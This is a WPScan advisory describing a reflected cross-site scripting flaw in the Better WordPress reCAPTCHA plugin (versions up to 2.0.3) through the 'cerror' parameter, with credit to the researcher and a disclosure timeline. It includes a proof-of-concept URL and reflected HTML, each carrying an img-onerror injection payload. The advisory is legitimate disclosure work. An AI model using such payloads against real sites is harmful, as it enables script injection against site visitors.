Better WordPress reCAPTCHA <= 2.0.3 - Unauthenticated Cross-Site Scripting (XSS)



Description
There is a reflected XSS vulnerability in Better WordPress reCAPTCHA plugin version 2.0.3, and possibly below.

The parameter cerror value is reflected in the page when this plugin is enabled. Once plugin disabled, the "cerror" parameter's value is not reflected in the page anymore.

This is the HTML source code:

<input id="url" name="url" type="url" value="" size="30" maxlength="200" /></p>
<p class="bwp-recaptcha-error error">Unknown error (\"><iMg src=N onerror=alert(9)>). Please contact an administrator for more info.</p>
Proof of Concept
https://www.example.com/page/?cerror="><img src=x onerror=alert(1)>

Affects Plugin

References

URL https://learn.ituniversity.ro/blog/20273/reflected-xss-wordpress-plugin

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Gabriel Avramescu
Submitter Gabriel Avramescu
Submitter Website https://www.ituniversity.ro/
Submitter Twitter ituniversityro
Views 2630
Verified Yes
WPVDB ID 9146

Timeline

Publicly Published 2018-11-07 (about 1 month ago)
Added 2018-11-12 (about 1 month ago)
Last Updated 2018-11-15 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.